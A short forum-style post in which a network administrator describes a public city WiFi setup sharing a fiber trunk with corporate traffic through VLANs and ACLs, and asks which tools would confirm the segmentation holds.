Hey Guys! So I’m about to go live with a Public City WiFi project soon. 80% of the Network will never touch our internal network - it’s all physically separated. However, there are two Point to MultiPoint links that will traverse our internal physical network - though, separated by VLANs and ACLs. Below is the exact setup:
Public Access Point > Switch (Access Point is on its own Access Port - VLAN with ACLs and Port Isolation Enabled. Traffic goes across a Fiber Trunk Port) (this switch does carry some of our corporate traffic over the same fiber uplink) > Uplink to core switch via Fiber > A port on the core switch is set to the same VLAN and Access Port, and dumps to a separate Firewall.
Essentially, I’m only sharing a fiber trunk port back to my Datacenter.
I feel that I have mitigated any risk, and I’ve done the normal NMAP/IP Scanner across the entire possible ranges to ensure nothing can talk, but I’d like to make sure I’m covering all my basis. Are there any other tools that I can run to ensure proper segmentation and ensure nothing could ever see our other traffic going across that shared fiber uplink?
No comments:
Post a Comment